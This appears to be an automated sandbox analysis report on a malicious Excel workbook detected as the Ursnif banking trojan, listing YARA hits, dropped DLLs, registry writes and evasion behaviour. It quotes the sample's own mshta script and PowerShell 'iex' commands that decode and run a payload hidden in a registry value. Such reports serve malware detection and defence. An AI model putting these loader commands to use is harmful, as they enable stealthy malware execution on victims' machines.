                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://powerlift.acompli.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://settings.outlook.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://shell.suite.office.com:1443
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://skyapi.live.net/Activity/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://staging.cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://store.office.cn/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://store.office.com/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://store.office.de/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://tasks.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://templatelogging.office.com/client/log
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://web.microsoftstream.com/video/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://webshell.suite.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://wus2.contentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://wus2.pagecontentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://www.odwebp.svc.ms
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownHTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

System Summary:

Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\Documents\decrypt.dll
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E8005 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB8005 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E2206
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E3109
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB2206
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB7DE0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB3109
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSB@31/52@7/2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{C75402C6-E233-4D86-BA8E-1D986541630A} - OProcSessId.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: documentation_39236.xlsb | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
                  Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
                  Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E7A60 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_001E7DCF push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB7A60 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 19_2_00FB7DCF push ecx; ret

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
                  Source: Yara match | File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3155
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2839
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2541
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2100
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 | Thread sleep count: 32 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 | Thread sleep count: 49 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 | Thread sleep count: 41 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 | Thread sleep count: 38 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 | Thread sleep time: -1667865539s >= -30000s
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 | Thread sleep count: 62 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 | Thread sleep count: 45 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 | Thread sleep count: 88 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 | Thread sleep count: 84 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 | Thread sleep count: 56 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 | Thread sleep count: 39 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672 | Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724 | Thread sleep count: 2541 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324 | Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 68 | Thread sleep count: 2100 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
